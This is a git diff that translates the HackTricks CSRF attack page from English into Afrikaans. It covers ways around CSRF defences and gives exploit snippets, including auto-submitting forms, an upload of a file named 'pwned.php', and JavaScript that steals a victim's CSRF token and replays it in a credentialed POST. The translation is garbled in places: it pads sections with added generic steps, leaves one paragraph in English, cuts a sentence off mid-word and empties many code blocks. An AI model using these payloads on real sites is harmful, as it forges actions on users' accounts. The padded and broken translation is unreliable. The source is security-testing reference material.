diff --git a/pentesting-web/csrf-cross-site-request-forgery.md b/pentesting-web/csrf-cross-site-request-forgery.md index c83adf72b..b4cf41e87 100644 --- a/pentesting-web/csrf-cross-site-request-forgery.md +++ b/pentesting-web/csrf-cross-site-request-forgery.md @@ -2,223 +2,208 @@
-Learn AWS hacking from zero to hero with htARTE (HackTricks AWS Red Team Expert)! +Leer AWS-hacking van nul tot held met htARTE (HackTricks AWS Red Team Expert)! -Other ways to support HackTricks: +Ander maniere om HackTricks te ondersteun: -* If you want to see your **company advertised in HackTricks** or **download HackTricks in PDF** Check the [**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)! -* Get the [**official PEASS & HackTricks swag**](https://peass.creator-spring.com) -* Discover [**The PEASS Family**](https://opensea.io/collection/the-peass-family), our collection of exclusive [**NFTs**](https://opensea.io/collection/the-peass-family) -* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@carlospolopm**](https://twitter.com/hacktricks_live)**.** -* **Share your hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos. +* As jy jou **maatskappy geadverteer wil sien in HackTricks** of **HackTricks in PDF wil aflaai**, kyk na die [**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)! +* Kry die [**amptelike PEASS & HackTricks swag**](https://peass.creator-spring.com) +* Ontdek [**The PEASS Family**](https://opensea.io/collection/the-peass-family), ons versameling eksklusiewe [**NFTs**](https://opensea.io/collection/the-peass-family) +* **Sluit aan by die** 💬 [**Discord-groep**](https://discord.gg/hRep4RUj7f) of die [**telegram-groep**](https://t.me/peass) of **volg** ons op **Twitter** 🐦 [**@carlospolopm**](https://twitter.com/hacktricks_live)**.** +* **Deel jou hacktruuks deur PR's in te dien by die** [**HackTricks**](https://github.com/carlospolop/hacktricks) en [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github-repos.
-Join [**HackenProof Discord**](https://discord.com/invite/N3FrSbmwdy) server to communicate with experienced hackers and bug bounty hunters! +Sluit aan by die [**HackenProof Discord**](https://discord.com/invite/N3FrSbmwdy) bediener om te kommunikeer met ervare hackers en foutbeloningsjagters! **Hacking Insights**\ -Engage with content that delves into the thrill and challenges of hacking +Gaan in gesprek met inhoud wat die opwinding en uitdagings van hacking ondersoek **Real-Time Hack News**\ -Keep up-to-date with fast-paced hacking world through real-time news and insights +Bly op hoogte van die vinnige wêreld van hacking deur middel van real-time nuus en insigte -**Latest Announcements**\ -Stay informed with the newest bug bounties launching and crucial platform updates +**Nuutste aankondigings**\ +Bly ingelig met die nuutste foutbelonings wat bekendgestel word en belangrike platform-opdaterings -**Join us on** [**Discord**](https://discord.com/invite/N3FrSbmwdy) and start collaborating with top hackers today! +**Sluit aan by ons op** [**Discord**](https://discord.com/invite/N3FrSbmwdy) en begin vandag saamwerk met top hackers! -## Cross-Site Request Forgery (CSRF) Explained +## Cross-Site Request Forgery (CSRF) Verduidelik -**Cross-Site Request Forgery (CSRF)** is a type of security vulnerability found in web applications. It enables attackers to perform actions on behalf of unsuspecting users by exploiting their authenticated sessions. The attack is executed when a user, who is logged into a victim's platform, visits a malicious site. This site then triggers requests to the victim's account through methods like executing JavaScript, submitting forms, or fetching images. +**Cross-Site Request Forgery (CSRF)** is 'n tipe sekuriteitskwesbaarheid wat in webtoepassings gevind word. Dit stel aanvallers in staat om aksies namens argeloos gebruikers uit te voer deur hul geauthentiseerde sessies uit te buit. 
Die aanval word uitgevoer wanneer 'n gebruiker, wat ingeteken is by 'n slagoffer se platform, 'n skadelike webwerf besoek. Hierdie webwerf veroorsaak dan versoek aan die slagoffer se rekening deur metodes soos die uitvoering van JavaScript, die indiening van vorms, of die ophaling van afbeeldings. -### Prerequisites for a CSRF Attack -To exploit a CSRF vulnerability, several conditions must be met: +### Voorvereistes vir 'n CSRF-aanval +Om 'n CSRF-kwesbaarheid uit te buit, moet verskeie voorwaardes voldoen word: -1. **Identify a Valuable Action**: The attacker needs to find an action worth exploiting, such as changing the user's password, email, or elevating privileges. -2. **Session Management**: The user's session should be managed solely through cookies or the HTTP Basic Authentication header, as other headers cannot be manipulated for this purpose. -3. **Absence of Unpredictable Parameters**: The request should not contain unpredictable parameters, as they can prevent the attack. +1. **Identifiseer 'n Waardevolle Aksie**: Die aanvaller moet 'n aksie vind wat die moeite werd is om uit te buit, soos die verandering van die gebruiker se wagwoord, e-pos, of verhoging van voorregte. +2. **Sessiebestuur**: Die gebruiker se sessie moet slegs deur koekies of die HTTP Basiese Verifikasie-kop beheer word, aangesien ander koppe nie vir hierdie doel gemanipuleer kan word nie. +3. **Afwees van Onvoorspelbare Parameters**: Die versoek mag nie onvoorspelbare parameters bevat nie, aangesien dit die aanval kan voorkom. -### Defending Against CSRF -Several countermeasures can be implemented to protect against CSRF attacks: +### Verdediging teen CSRF +Verskeie teenmaatreëls kan geïmplementeer word om teen CSRF-aanvalle te beskerm: -* [**SameSite cookies**](hacking-with-cookies/#samesite): This attribute prevents the browser from sending cookies along with cross-site requests. [More about SameSite cookies](hacking-with-cookies/#samesite). 
-* [**Cross-origin resource sharing**](cors-bypass.md): The CORS policy of the victim site can influence the feasibility of the attack, especially if the attack requires reading the response from the victim site. [Learn about CORS bypass](cors-bypass.md). -* **User Verification**: Prompting for the user's password or solving a captcha can confirm the user's intent. -* **Checking Referrer or Origin Headers**: Validating these headers can help ensure requests are coming from trusted sources. However, careful crafting of URLs can bypass poorly implemented checks, such as: - - Using `http://mal.net?orig=http://example.com` (URL ends with the trusted URL) - - Using `http://example.com.mal.net` (URL starts with the trusted URL) -* **Modifying Parameter Names**: Altering the names of parameters in POST or GET requests can help in preventing automated attacks. -* **CSRF Tokens**: Incorporating a unique CSRF token in each session and requiring this token in subsequent requests can significantly mitigate the risk of CSRF. The effectiveness of the token can be enhanced by enforcing CORS. +* [**SameSite-koekies**](hacking-with-cookies/#samesite): Hierdie eienskap voorkom dat die blaaier koekies saam met kruiswebwerfversoeke stuur. [Meer oor SameSite-koekies](hacking-with-cookies/#samesite). +* [**Cross-origin resource sharing**](cors-bypass.md): Die CORS-beleid van die slagoffer se webwerf kan die uitvoerbaarheid van die aanval beïnvloed, veral as die aanval vereis dat die respons van die slagoffer se webwerf gelees word. [Leer oor CORS-omseiling](cors-bypass.md). +* **Gebruikersverifikasie**: Die versoek om die gebruiker se wagwoord te vra of 'n captcha op te los, kan die gebruiker se bedoeling bevestig. +* **Kontroleer Verwysers of Oorsprongkoppe**: Die validering van hierdie koppe kan help om te verseker dat versoek van betroubare bronne afkomstig is. 
Tog kan sorgvuldige samestelling van URL's swak geïmplementeerde kontroles omseil, soos: +- Gebruik van `http://mal.net?orig=http://example.com` (URL eindig met die betroubare URL) +- Gebruik van `http://example.com.mal.net` (URL begin met die betroubare URL) +* **Wysiging van Parametername**: Die wysiging van die name van parameters in POST- of GET-versoeke kan help om outomatiese aanvalle te voorkom. +* **CSRF-tokens**: Die inkorporering van 'n unieke CSRF-token in elke sessie en die vereiste van hierdie token in volgende versoek kan die risiko van CSRF aansienlik verminder. Die doeltreffendheid van die token kan verhoog word deur CORS af te dwing. -Understanding and implementing these defenses is crucial for maintaining the security and integrity of web applications. +Die begrip en implementering van hierdie verdedigings is noodsaaklik vir die handhawing van die sekuriteit en integriteit van webtoepassings. -## Defences Bypass +## Verdedigingsomseiling -### From POST to GET +### Van POST na GET -Maybe the form you want to abuse is prepared to send a **POST request with a CSRF token but**, you should **check** if a **GET** is also **valid** and if when you send a GET request the **CSRF token is still being validated**. +Miskien is die vorm wat jy wil misbruik, gereed om 'n **POST-versoek met 'n CSRF-token te stuur**, maar jy moet **nagaan** of 'n **GET** ook **geldig** is en of die **CSRF-token steeds gevalideer word** wanneer jy 'n GET-versoek stuur. -### Lack of token +### Gebrek aan token -Applications might implement a mechanism to **validate tokens** when they are present. However, a vulnerability arises if the validation is skipped altogether when the token is absent. Attackers can exploit this by **removing the parameter** that carries the token, not just its value. This allows them to circumvent the validation process and conduct a Cross-Site Request Forgery (CSRF) attack effectively. 
+Toepassings kan 'n meganisme implementeer om **tokens te valideer** wanneer hulle teenwoordig is. 'n Kwesbaarheid ontstaan egter as die validering heeltemal omseil word wanneer die token afwesig is. Aanvallers kan dit uitbuit deur die parameter wat die token dra, te **verwyder**, nie net sy waarde nie. Dit stel hulle in staat om die valideringsproses te omseil en 'n Cross-Site Request Forgery (CSRF) aanval doeltreffend uit te voer. -### CSRF token is not tied to the user session +### CSRF-token is nie gekoppel aan die gebruikersessie nie -Applications **not tying CSRF tokens to user sessions** present a significant **security risk**. These systems verify tokens against a **global pool** rather than ensuring each token is bound to the initiating session. +Toepassings wat CSRF-tokens **nie aan gebruikersessies koppel nie**, bied 'n aansienlike **sekuriteitsrisiko**. Hierdie stelsels verifieer tokens teen 'n **globale poel** eerder as om te verseker dat elke token aan die inisieerende sessie gekoppel is. -Here's how attackers exploit this: +So misbruik aanvallers dit: -1. **Authenticate** using their own account. -2. **Obtain a valid CSRF token** from the global pool. -3. **Use this token** in a CSRF attack against a victim. +1. **Verifieer** met hul eie rekening. +2. **Verkry 'n geldige CSRF-token** uit die globale poel. +3. **Gebruik hierdie token** in 'n CSRF-aanval teen 'n slagoffer. -This vulnerability allows attackers to make unauthorized requests on behalf of the victim, exploiting the application's **inadequate token validation mechanism**. +Hierdie kwesbaarheid stel aanvallers in staat om ongemagtigde versoek op naam van die slagoffer te maak deur die toepassing se **onvoldoende token-valideringsmeganisme** uit te buit. -### Method bypass +### Metode-omseiling -If the request is using a "**weird**" **method**, check if the **method** **override functionality** is working. 
-For example, if it's **using a PUT** method you can try to **use a POST** method and **send**: _https://example.com/my/dear/api/val/num?**\_method=PUT**_ +As die versoek 'n "**vreemde**" **metode** gebruik, kyk of die **metode-oorrulfunksionaliteit** werk. +Byvoorbeeld, as dit 'n **PUT**-metode gebruik, kan jy probeer om 'n **POST**-metode te gebruik en te **stuur**: _https://example.com/my/dear/api/val/num?**\_method=PUT**_ -This could also works sending the **\_method parameter inside the a POST request** or using the **headers**: +Dit kan ook werk deur die **\_method-parameter binne 'n POST-versoek** te stuur of deur die **koppe** te gebruik: * _X-HTTP-Method_ * _X-HTTP-Method-Override_ * _X-Method-Override_ -### Custom header token bypass +### Omseiling van aangepaste kop-token -If the request is adding a **custom header** with a **token** to the request as **CSRF protection method**, then: +As die versoek 'n **aangepaste kop** met 'n **token** by die versoek voeg as **CSRF-beskermingsmetode**, dan: -* Test the request without the **Customized Token and also header.** -* Test the request with exact **same length but different token**. +* Toets die versoek sonder die **aangepaste token en ook die kop.** +* Toets die versoek met presies **dieselfde lengte maar 'n ander token**. -### CSRF token is verified by a cookie - -Applications may implement CSRF protection by duplicating the token in both a cookie and a request parameter or by setting a CSRF cookie and verifying if the token sent in the backend corresponds to the cookie. The application validates requests by checking if the token in the request parameter aligns with the value in the cookie. - -However, this method is vulnerable to CSRF attacks if the website has flaws allowing an attacker to set a CSRF cookie in the victim's browser, such as a CRLF vulnerability. The attacker can exploit this by loading a deceptive image that sets the cookie, followed by initiating the CSRF attack. 
- -Below is an example of how an attack could be structured: +### CSRF-token word geverifieer deur 'n koekie +Toepassings kan CSRF-beskerming implementeer deur die token in beide 'n koekie en 'n versoekparameter te dupliseer of deur 'n CSRF-koekie in te stel en te verifieer of die token wat in die agtergrond gestuur word, ooreenstem met die koek ```html - - - -
- - - -
- - + + + +
+ + + +
+ + ``` - {% hint style="info" %} -Note that if the **csrf token is related with the session cookie this attack won't work** because you will need to set the victim your session, and therefore you will be attacking yourself. +Let daarop dat as die **csrf-token verband hou met die sessiekoekie, sal hierdie aanval nie werk nie** omdat jy die slagoffer jou sessie moet stel, en dus sal jy jouself aanval. {% endhint %} -### Content-Type change +### Verandering van inhoudstipe -According to [**this**](https://developer.mozilla.org/en-US/docs/Web/HTTP/CORS#simple\_requests), in order to **avoid preflight** requests using **POST** method these are the allowed Content-Type values: +Volgens [**hierdie**](https://developer.mozilla.org/en-US/docs/Web/HTTP/CORS#simple\_requests), om **vooraanvrae te vermy** deur die **POST**-metode te gebruik, is hierdie die toegelate waardes vir Inhoudstipe: * **`application/x-www-form-urlencoded`** * **`multipart/form-data`** * **`text/plain`** -However, note that the **severs logic may vary** depending on the **Content-Type** used so you should try the values mentioned and others like **`application/json`**_**,**_**`text/xml`**, **`application/xml`**_._ - -Example (from [here](https://brycec.me/posts/corctf\_2021\_challenges)) of sending JSON data as text/plain: +Let egter daarop dat die **bedienerslogika kan wissel** afhangende van die gebruikte Inhoudstipe, so jy moet die genoemde waardes probeer asook ander soos **`application/json`**_**,**_**`text/xml`**, **`application/xml`**_._ +Voorbeeld (van [hier](https://brycec.me/posts/corctf\_2021\_challenges)) van die stuur van JSON-data as teks/plain: ```html - -
- -
- - + +
+ +
+ + ``` +### Omleiding van Preflight-aanvrae vir JSON-data -### Bypassing Preflight Requests for JSON Data +Wanneer jy probeer om JSON-data via 'n POST-aanvraag te stuur, is dit nie direk moontlik om die `Content-Type: application/json` in 'n HTML-vorm te gebruik nie. Op dieselfde manier veroorsaak die gebruik van `XMLHttpRequest` om hierdie inhoudstipe te stuur 'n preflight-aanvraag. Daar is egter strategieë om moontlik hierdie beperking te omseil en te kyk of die bediener die JSON-data verwerk, ongeag die Content-Type: -When attempting to send JSON data via a POST request, using the `Content-Type: application/json` in an HTML form is not directly possible. Similarly, utilizing `XMLHttpRequest` to send this content type initiates a preflight request. Nonetheless, there are strategies to potentially bypass this limitation and check if the server processes the JSON data irrespective of the Content-Type: +1. **Gebruik Alternatiewe Inhoudstipes**: Gebruik `Content-Type: text/plain` of `Content-Type: application/x-www-form-urlencoded` deur `enctype="text/plain"` in die vorm in te stel. Hierdie benadering toets of die agterkant die data gebruik, ongeag die Content-Type. -1. **Use Alternative Content Types**: Employ `Content-Type: text/plain` or `Content-Type: application/x-www-form-urlencoded` by setting `enctype="text/plain"` in the form. This approach tests if the backend utilizes the data regardless of the Content-Type. - -2. **Modify Content Type**: To avoid a preflight request while ensuring the server recognizes the content as JSON, you can send the data with `Content-Type: text/plain; application/json`. This doesn't trigger a preflight request but might be processed correctly by the server if it's configured to accept `application/json`. +2. **Wysig Inhoudstipe**: Om 'n preflight-aanvraag te vermy terwyl die bediener die inhoud as JSON herken, kan jy die data stuur met `Content-Type: text/plain; application/json`. 
Dit veroorsaak nie 'n preflight-aanvraag nie, maar dit kan korrek deur die bediener verwerk word as dit gekonfigureer is om `application/json` te aanvaar. -3. **SWF Flash File Utilization**: A less common but feasible method involves using an SWF flash file to bypass such restrictions. For an in-depth understanding of this technique, refer to [this post](https://anonymousyogi.medium.com/json-csrf-csrf-that-none-talks-about-c2bf9a480937). +3. **SWF Flash-lêergebruik**: 'n Minder algemene maar uitvoerbare metode behels die gebruik van 'n SWF-flash-lêer om sulke beperkings te omseil. Vir 'n dieper begrip van hierdie tegniek, verwys na [hierdie pos](https://anonymousyogi.medium.com/json-csrf-csrf-that-none-talks-about-c2bf9a480937). -### Referrer / Origin check bypass +### Verwysings- / Oorsprong-omseiling -**Avoid Referrer header** - -Applications may validate the 'Referer' header only when it's present. To prevent a browser from sending this header, the following HTML meta tag can be used: +**Vermy Verwysingskop** +Toepassings kan die 'Referer'-kop slegs valideer as dit teenwoordig is. Om te voorkom dat 'n webblaaier hierdie kop stuur, kan die volgende HTML-meta-etiket gebruik word: ```xml ``` +Dit verseker dat die 'Referer' kop nie ingesluit word nie, wat moontlik validasie kontroles in sommige toepassings kan omseil. -This ensures the 'Referer' header is omitted, potentially bypassing validation checks in some applications. - -**Regexp bypasses** +**Regexp omseilings** {% content-ref url="ssrf-server-side-request-forgery/url-format-bypass.md" %} [url-format-bypass.md](ssrf-server-side-request-forgery/url-format-bypass.md) {% endcontent-ref %} -To set the domain name of the server in the URL that the Referrer is going to send inside the parameters you can do: - +Om die domeinnaam van die bediener in die URL in te stel wat die Verwysingsbron binne die parameters gaan stuur, kan jy doen: ```html - - - - -
- - -
- - + + + + +
+ + +
+ + ``` +### **KOP-metode omseil** -### **HEAD method bypass** +Die eerste deel van [**hierdie CTF writeup**](https://github.com/google/google-ctf/tree/master/2023/web-vegsoda/solution) verduidelik dat [Oak se bronkode](https://github.com/oakserver/oak/blob/main/router.ts#L281), 'n router ingestel is om **HEAD-versoeke as GET-versoeke** te hanteer sonder 'n responsliggaam - 'n algemene omweg wat nie uniek is tot Oak nie. In plaas van 'n spesifieke hanterer wat met HEAD-versoeke werk, word hulle eenvoudigweg **aan die GET-hanterer gegee, maar die toepassing verwyder net die responsliggaam**. -The first part of [**this CTF writeup**](https://github.com/google/google-ctf/tree/master/2023/web-vegsoda/solution) is explained that [Oak's source code](https://github.com/oakserver/oak/blob/main/router.ts#L281), a router is set to **handle HEAD requests as GET requests** with no response body - a common workaround that isn't unique to Oak. Instead of a specific handler that deals with HEAD reqs, they're simply **given to the GET handler but the app just removes the response body**. +Daarom, as 'n GET-versoek beperk word, kan jy eenvoudig 'n HEAD-versoek stuur wat as 'n GET-versoek verwerk sal word. -Therefore, if a GET request is being limited, you could just **send a HEAD request that will be processed as a GET request**. +## **Exploit-voorbeelde** -## **Exploit Examples** +### **Uitlek van CSRF-token** -### **Exfiltrating CSRF Token** - -If a **CSRF token** is being used as **defence** you could try to **exfiltrate it** abusing a [**XSS**](xss-cross-site-scripting/#xss-stealing-csrf-tokens) vulnerability or a [**Dangling Markup**](dangling-markup-html-scriptless-injection/) vulnerability. 
- -### **GET using HTML tags** +As 'n **CSRF-token** as **verdediging** gebruik word, kan jy probeer om dit te **uitlek** deur 'n [**XSS**](xss-cross-site-scripting/#xss-stealing-csrf-tokens) kwesbaarheid of 'n [**Dangling Markup**](dangling-markup-html-scriptless-injection/) kwesbaarheid te misbruik. +### **GET met behulp van HTML-etikette** ```xml

404 - Page not found

The URL you are requesting is no longer available ``` - -Other HTML5 tags that can be used to automatically send a GET request are: - +Ander HTML5-etikette wat gebruik kan word om outomaties 'n GET-versoek te stuur, is: ```html @@ -233,82 +218,136 @@ Other HTML5 tags that can be used to automatically send a GET request are:
``` +### Vorm GET-versoek -### Form GET request +'n GET-versoek word gebruik om inligting van 'n webbediener te versoek deur die inligting as deel van die URL-parameters te stuur. Dit is 'n eenvoudige manier om data van 'n webvorm na 'n bediener te stuur. Die data word in die URL-parameters gekodeer en is dus sigbaar in die URL-ry. Hier is 'n voorbeeld van 'n GET-versoek: + +```html +
+ + + +
+``` + +In hierdie voorbeeld sal die gebruikersnaam en wagwoord wat deur die gebruiker ingevul word, as deel van die URL na die "/login"-roete gestuur word. Die URL sal soos volg lyk: + +``` +http://www.example.com/login?username=gebruiker&password=wagwoord +``` + +Dit is belangrik om te besef dat 'n GET-versoek nie geskik is vir die stuur van sensitiewe inligting soos wagwoorde nie, aangesien die data sigbaar is in die URL. +```html + + + + +
+ + +
+ + + +``` +### Vorm POST versoek + +A form POST request is a type of HTTP request that is used to submit data to a server. It is commonly used in web applications to send data from a form to the server for processing. The data is sent in the body of the request, and the server processes it based on the specified action. + +In a form POST request, the data is typically sent as key-value pairs. The keys represent the names of the form fields, and the values represent the data entered by the user. The data can be sent in various formats, such as URL-encoded or JSON. + +To send a form POST request, you need to specify the target URL and the data to be sent. This can be done using HTML forms or programmatically using JavaScript or other programming languages. The request is then sent to the server, which processes the data and returns a response. + +Form POST requests are vulnerable to Cross-Site Request Forgery (CSRF) attacks, where an attacker tricks a user into unknowingly submitting a malicious form. To protect against CSRF attacks, web applications can implement measures such as using CSRF tokens or checking the origin of the request. + +Overall, form POST requests are a fundamental part of web development and are widely used for submitting data to servers. Understanding how they work and their vulnerabilities is essential for both developers and security professionals. +```html + + + +
+ + + +
+ + + +``` +### Vorm POST-aanvraag deur middel van 'n iframe + +'n CSRF-aanval (Cross-Site Request Forgery) is 'n aanvalstegniek waar 'n aanvaller 'n gebruiker se vertroue in 'n webtoepassing misbruik om ongewenste aksies namens die gebruiker uit te voer. Een van die metodes wat gebruik kan word om 'n CSRF-aanval uit te voer, is deur 'n vorm POST-aanvraag te doen deur middel van 'n iframe. + +Hier is die stappe om 'n vorm POST-aanvraag deur middel van 'n iframe uit te voer: + +1. Skep 'n HTML-bladsy wat 'n vorm bevat wat jy wil indien. +2. Skep 'n iframe-element op dieselfde bladsy en stel die bron (src) van die iframe in op die doelwit van jou aanval. +3. Stel die waardes van die vormveld in op die waardes wat jy wil indien. +4. Gebruik JavaScript om die vorm in die iframe te indien deur die `submit()`-metode van die vormelement aan te roep. + +Hier is 'n voorbeeld van hoe die HTML-kode kan lyk: ```html - - - -
- - -
- - + +
+ + +
+ + + + + ``` -### Form POST request +Met hierdie tegniek sal die vorm POST-aanvraag outomaties ingedien word wanneer die bladsy gelaai word. Dit kan gebruik word om ongewenste aksies uit te voer, soos om 'n gebruiker se wagwoord te verander of om transaksies namens die gebruiker te doen. +Dit is belangrik om te besef dat 'n CSRF-aanval slegs suksesvol sal wees as die gebruiker reeds aangemeld is by die doelwit-webtoepassing. ```html - - - -
- - - -
- - - -``` - -### Form POST request through iframe - -```html - - - -
- - -
- - + + +
+ + +
+ + ``` - -### **Ajax POST request** - +### **Ajax POST versoek** ```html ``` +### multipart/form-data POS-aanvraag -### multipart/form-data POST request +'n multipart/form-data POS-aanvraag word gebruik om data na 'n bediener te stuur deur die gebruik van die HTTP POST-metode. Hierdie tipe aanvraag word dikwels gebruik wanneer daar lêers of ander nie-tekstuele data gestuur moet word. +Die aanvraag se inhoud word verdeel in verskillende dele, elk met 'n eie inhoudstipe en inhoud. Elke deel bevat 'n sleutel-waarde-paar, waar die sleutel die naam van die vormveld is en die waarde die inhoud van die veld is. + +Die inhoudstipe van die aanvraag is "multipart/form-data" en die inhoudsopbou word aangedui deur die "boundary" parameter. Die "boundary" parameter is 'n unieke tekenreeks wat gebruik word om die grense tussen die verskillende dele van die aanvraag aan te dui. + +Byvoorbeeld, 'n multipart/form-data POS-aanvraag kan gebruik word om 'n lêer na 'n bediener te stuur. Die lêer sal as 'n deel van die aanvraag ingesluit word, met die sleutel as die naam van die vormveld en die waarde as die inhoud van die lêer. + +Dit is belangrik om te weet dat 'n CSRF-aanval (Cross-Site Request Forgery) moontlik is met 'n multipart/form-data POS-aanvraag. In 'n CSRF-aanval kan 'n aanvaller 'n vervalste aanvraag stuur namens 'n ingelogde gebruiker, wat kan lei tot ongewenste aksies of datalekke. 
```javascript myFormData = new FormData(); var blob = new Blob([""], { type: "text/text"}); myFormData.append("newAttachment", blob, "pwned.php"); fetch("http://example/some/path", { - method: "post", - body: myFormData, - credentials: "include", - headers: {"Content-Type": "application/x-www-form-urlencoded"}, - mode: "no-cors" +method: "post", +body: myFormData, +credentials: "include", +headers: {"Content-Type": "application/x-www-form-urlencoded"}, +mode: "no-cors" }); ``` - -### multipart/form-data POST request v2 - +### multipart/form-data POST versoek v2 ```javascript // https://www.exploit-db.com/exploits/20009 var fileSize = fileData.length, 
@@ -361,9 +406,15 @@ body += "--" + boundary + "--"; //xhr.send(body); xhr.sendAsBinary(body); ``` +### Vorm POST-aanvraag van binne 'n iframe -### Form POST request from within an iframe +Wanneer 'n webbladsy 'n vorm bevat wat 'n POST-aanvraag na 'n ander webbladsy stuur, kan hierdie vorm ook binne 'n iframe geplaas word. Dit beteken dat die vorm onsigbaar kan wees vir die gebruiker terwyl dit steeds agter die skerms data na 'n ander webbladsy stuur. +Hierdie tegniek kan gebruik word vir 'n CSRF-aanval (Cross-Site Request Forgery). Die aanvaller kan 'n webbladsy skep wat 'n vorm bevat wat agter die skerms data na 'n ander webbladsy stuur sonder dat die gebruiker daarvan bewus is. As die gebruiker toevallig die aanvallige webbladsy besoek terwyl hy aangemeld is by die teikenwebwerf, sal die vormaansoek uitgevoer word met die legitimasie van die gebruiker. Dit kan die aanvaller in staat stel om aksies namens die gebruiker uit te voer sonder sy toestemming. + +Om hierdie tipe aanval te voorkom, kan die teikenwebwerf CSRF-beskerming implementeer deur gebruik te maak van tokens. Hierdie tokens word gegenereer en aan die vorm toegevoeg. Wanneer die vormaansoek ontvang word, word die token geverifieer om te verseker dat dit geldig is en dat die aansoek nie deur 'n aanvaller gestuur is nie. + +Dit is belangrik vir webontwikkelaars om bewus te wees van hierdie tegniek en om toepaslike veiligheidsmaatreëls te implementeer om CSRF-aanvalle te voorkom. ```html <--! expl.html --> @@ -381,58 +432,90 @@ function envia(){document.getElementById("formulario").submit();}

Sitio bajo mantenimiento. Disculpe las molestias

``` +### **Steel CSRF-token en stuur 'n POST-versoek** -### **Steal CSRF Token and send a POST request** +Om 'n CSRF-token te steel en 'n POST-versoek te stuur, kan jy die volgende stappe volg: +1. Identifiseer die doelwit-webwerf waarop jy wil inbreek. +2. Analiseer die webwerf se bronkode om die CSRF-token te vind. Die token is gewoonlik ingesluit in 'n versteekte veld of as 'n koekie. +3. Skryf 'n skripsie of gebruik 'n hulpmiddel soos 'n webkrapper om die CSRF-token te onttrek. +4. Stel 'n POST-versoek op met die gesteelde CSRF-token en die nodige parameters vir die aangevraagde aksie. +5. Stuur die POST-versoek na die doelwit-webwerf se bedienaar. +6. Monitor die respons om te sien of die aangevraagde aksie suksesvol uitgevoer is. + +Dit is belangrik om te onthou dat die gebruik van CSRF-tegnieke om ongemagtigde aksies uit te voer teen 'n webwerf onwettig is en etiese implikasies het. Hierdie tegnieke moet slegs gebruik word vir wettige doeleindes, soos om sekuriteitslekke in 'n webwerf te identifiseer en te verhelp. 
```javascript function submitFormWithTokenJS(token) { - var xhr = new XMLHttpRequest(); - xhr.open("POST", POST_URL, true); - xhr.withCredentials = true; +var xhr = new XMLHttpRequest(); +xhr.open("POST", POST_URL, true); +xhr.withCredentials = true; - // Send the proper header information along with the request - xhr.setRequestHeader("Content-type", "application/x-www-form-urlencoded"); +// Send the proper header information along with the request +xhr.setRequestHeader("Content-type", "application/x-www-form-urlencoded"); - // This is for debugging and can be removed - xhr.onreadystatechange = function() { - if(xhr.readyState === XMLHttpRequest.DONE && xhr.status === 200) { - //console.log(xhr.responseText); - } - } +// This is for debugging and can be removed +xhr.onreadystatechange = function() { +if(xhr.readyState === XMLHttpRequest.DONE && xhr.status === 200) { +//console.log(xhr.responseText); +} +} - xhr.send("token=" + token + "&otherparama=heyyyy"); +xhr.send("token=" + token + "&otherparama=heyyyy"); } function getTokenJS() { - var xhr = new XMLHttpRequest(); - // This tels it to return it as a HTML document - xhr.responseType = "document"; - xhr.withCredentials = true; - // true on the end of here makes the call asynchronous - xhr.open("GET", GET_URL, true); - xhr.onload = function (e) { - if (xhr.readyState === XMLHttpRequest.DONE && xhr.status === 200) { - // Get the document from the response - page = xhr.response - // Get the input element - input = page.getElementById("token"); - // Show the token - //console.log("The token is: " + input.value); - // Use the token to submit the form - submitFormWithTokenJS(input.value); - } - }; - // Make the request - xhr.send(null); +var xhr = new XMLHttpRequest(); +// This tels it to return it as a HTML document +xhr.responseType = "document"; +xhr.withCredentials = true; +// true on the end of here makes the call asynchronous +xhr.open("GET", GET_URL, true); +xhr.onload = function (e) { +if (xhr.readyState === 
XMLHttpRequest.DONE && xhr.status === 200) { +// Get the document from the response +page = xhr.response +// Get the input element +input = page.getElementById("token"); +// Show the token +//console.log("The token is: " + input.value); +// Use the token to submit the form +submitFormWithTokenJS(input.value); +} +}; +// Make the request +xhr.send(null); } var GET_URL="http://google.com?param=VALUE" var POST_URL="http://google.com?param=VALUE" getTokenJS(); ``` +### **Steel CSRF-token en stuur 'n Post-aanvraag deur gebruik te maak van 'n iframe, 'n vorm en Ajax** -### **Steal CSRF Token and send a Post request using an iframe, a form and Ajax** +Om 'n CSRF-token te steel en 'n Post-aanvraag te stuur, kan jy die volgende metodes gebruik: 'n iframe, 'n vorm en Ajax. +#### **Metode 1: iframe** + +1. Skep 'n iframe-element in die HTML-kode van jou aanvalspagina. +2. Stel die bron van die iframe in op die doelwebwerf se URL waar die CSRF-token gegenereer word. +3. Gebruik JavaScript om die CSRF-token van die iframe-element te kry. +4. Stuur 'n Post-aanvraag na die doelwebwerf deur die CSRF-token as 'n parameter in te sluit. + +#### **Metode 2: vorm** + +1. Skep 'n vorm-element in die HTML-kode van jou aanvalspagina. +2. Stel die aksie van die vorm in op die doelwebwerf se URL waar die CSRF-token gegenereer word. +3. Voeg 'n verborge veld by in die vorm met die naam en waarde van die CSRF-token. +4. Stuur die vorm na die doelwebwerf deur dit te indien. + +#### **Metode 3: Ajax** + +1. Gebruik JavaScript om 'n Ajax-aanvraag na die doelwebwerf te stuur. +2. Stel die metode van die aanvraag in op Post. +3. Voeg die CSRF-token as 'n parameter by in die aanvraagdata. +4. Stuur die Ajax-aanvraag na die doelwebwerf. + +Deur een van hierdie metodes te gebruik, kan jy 'n CSRF-token steel en dit gebruik om 'n Post-aanvraag na die doelwebwerf te stuur. Onthou egter dat hierdie metodes vir aanvalle gebruik kan word en dat dit belangrik is om etiese hackingpraktyke te volg. ```html
@@ -442,100 +525,167 @@ getTokenJS(); + ``` +### **Steel CSRF-token en stuur 'n POST-aanvraag deur gebruik te maak van 'n iframe en 'n vorm** -### **Steal CSRF Token and sen a POST request using an iframe and a form** +Om 'n CSRF-token te steel en 'n POST-aanvraag te stuur, kan jy die volgende metode gebruik: +1. Skep 'n iframe-element in die HTML-kode van jou aanvalswebwerf. Die iframe-element moet verwys na die doelwitwebwerf waarop jy die POST-aanvraag wil uitvoer. + + ```html + + ``` + +2. Skep 'n vorm-element binne die iframe-element. Die vorm moet die nodige veldwaardes bevat vir die POST-aanvraag wat jy wil uitvoer. Dit moet ook 'n verborge veld hê wat die gesteelde CSRF-token bevat. + + ```html + + + +
